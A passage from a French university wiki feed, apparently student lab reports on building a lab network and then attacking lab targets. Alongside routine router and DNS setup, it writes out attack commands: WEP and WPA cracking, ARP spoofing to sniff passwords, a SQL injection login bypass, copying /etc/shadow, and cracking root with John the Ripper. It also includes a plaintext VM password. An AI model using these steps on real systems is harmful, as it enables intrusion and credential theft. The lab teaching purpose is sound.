&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53681</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53681"/>
				<updated>2020-11-16T11:22:58Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.2  Serveur DNS (02/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net&lt;br /&gt;
 @       IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
